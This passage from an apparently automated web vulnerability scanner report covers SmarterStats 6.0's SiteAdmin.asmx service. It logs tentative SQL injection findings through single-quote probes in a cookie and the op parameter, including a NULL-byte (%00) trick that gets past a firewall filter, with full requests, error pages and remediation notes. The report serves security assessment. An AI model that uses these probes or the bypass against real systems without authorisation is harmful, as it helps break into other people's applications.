The loginsettings cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the loginsettings cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=';

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:07 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings='';

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14402
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

</span>









</body>
</html>

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite3%00' HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:33:16 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver&g